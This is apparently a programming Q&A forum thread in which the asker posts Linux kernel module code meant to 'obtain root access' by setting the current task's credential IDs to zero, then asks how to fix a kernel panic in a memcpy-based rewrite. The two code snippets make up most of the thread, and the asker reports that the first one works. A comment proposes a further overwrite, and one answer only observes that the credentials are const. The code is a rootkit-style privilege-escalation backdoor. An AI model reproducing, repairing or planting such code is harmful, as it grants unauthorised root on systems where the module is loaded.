# Linux kernel alloc cache to remove const warning

Tags: linux, memory-management, module, kernel

My goal is to write a fonction in a kernel module that allow to obtain root access.
At original time I've got this :

```
struct task_struct *cur_task;
struct cred *credz;
/*obtain root access*/
cur_task=current;
credz=cur_task->cred;
credz->uid=0;
credz->gid=0;
credz->suid=0;
credz->sgid=0;
credz->euid=0;
credz->egid=0;
```

It works but I try to remove the warning about const variable.
So I try a memcopy to bypass it. But i have got a kernel panic.

I think my error is memory allocation (kmem cache)

```
static struct kmem_cache *cred_jar; //global

char func(void){
        struct task_struct *cur_task;
        const struct cred *old;
        struct cred *credz;

        cred_jar = kmem_cache_create("cred_jar", sizeof(struct cred), 0, SLAB_HWCACHE_ALIGN|SLAB_PANIC, NULL);
        credz = kmem_cache_alloc(cred_jar, GFP_KERNEL);
        if (!credz){

            return 0;
        }
        /* obtain root access in shell*/
        cur_task=current;
        /**/
        old = cur_task->cred;

        /* remove warning const */
        memcpy(credz, old, sizeof(struct cred));
        credz->uid=0;
        credz->gid=0;
        credz->suid=0;
        credz->sgid=0;
        credz->euid=0;
        credz->egid=0; 
        cur_task->cred=credz;
        kfree(old);
}
```

If you have any idea to correct it, I'm interested.

Comment: And direct copy into `cur_task->cred` doesn't work? I mean this way: `memcpy(cur_task->cred, credz, sizeof(struct cred));`

Answer (score 1):

I'd think that the reason it's marked as `const` is that you shouldn't change or replace it, hence the kernel panic